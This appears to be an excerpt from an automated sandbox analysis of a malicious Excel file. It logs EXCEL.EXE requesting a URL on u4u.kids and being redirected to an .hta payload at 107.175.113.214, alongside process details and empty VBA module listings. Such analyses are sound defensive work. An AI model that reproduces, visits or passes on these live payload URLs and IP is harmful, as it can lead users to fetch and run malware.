                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 107.175.113.214 Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.224916124.199.88.844433288C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2024-10-24 19:19:25 UTC442OUTGET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: u4u.kids
                      Connection: Keep-Alive
                      2024-10-24 19:19:25 UTC498INHTTP/1.1 302 Found
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Thu, 24 Oct 2024 19:19:25 GMT
                      Content-Type: text/plain; charset=utf-8
                      Content-Length: 119
                      Connection: close
                      X-DNS-Prefetch-Control: off
                      X-Frame-Options: SAMEORIGIN
                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 0
                      Location: http://107.175.113.214/xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta
                      Vary: Accept
                      2024-10-24 19:19:25 UTC119INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 2f 78 61 6d 70 70 2f 6e 78 2f 6e 69 78 6f 67 69 76 65 6e 62 65 73 74 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 77 69 6c 6c 69 6e 74 68 65 6c 69 6e 65 66 6f 72 67 72 65 61 74 74 68 69 6e 67 73 2e 68 74 61
                      Data Ascii: Found. Redirecting to http://107.175.113.214/xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Target ID:0
                      Start time:15:19:03
                      Start date:24/10/2024
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x13fee0000
                      File size:28'253'536 bytes
                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Call Graph

                      • Entrypoint
                      • Decryption Function
                      • Executed
                      • Not Executed
                      • Show Help
                      callgraph 1 Error: Graph is empty

                      Module: Sheet1

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet1"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: Sheet2

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet2"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: Sheet3

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet3"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: ThisWorkbook

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "ThisWorkbook"

                      2

                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Reset < >